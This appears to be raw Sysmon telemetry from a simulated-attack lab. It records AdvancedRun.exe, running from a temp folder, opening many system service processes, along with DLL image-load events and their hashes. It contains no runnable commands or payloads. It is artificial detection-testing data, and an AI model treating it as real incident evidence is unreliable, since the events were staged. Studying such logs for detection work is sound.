18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004011644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004011642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:44.567{834264DD-FF16-61EA-CD05-000000002702}52164720C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004011640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:44:38.738{834264DD-DAE4-61EA-0C00-000000002702}652332C:\Windows\system32\lsass.exe{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000004011411Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011410Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011409Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011408Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011407Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000004011406Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:44:38.738{834264DD-FF16-61EA-CD05-000000002702}5216C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004011405Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 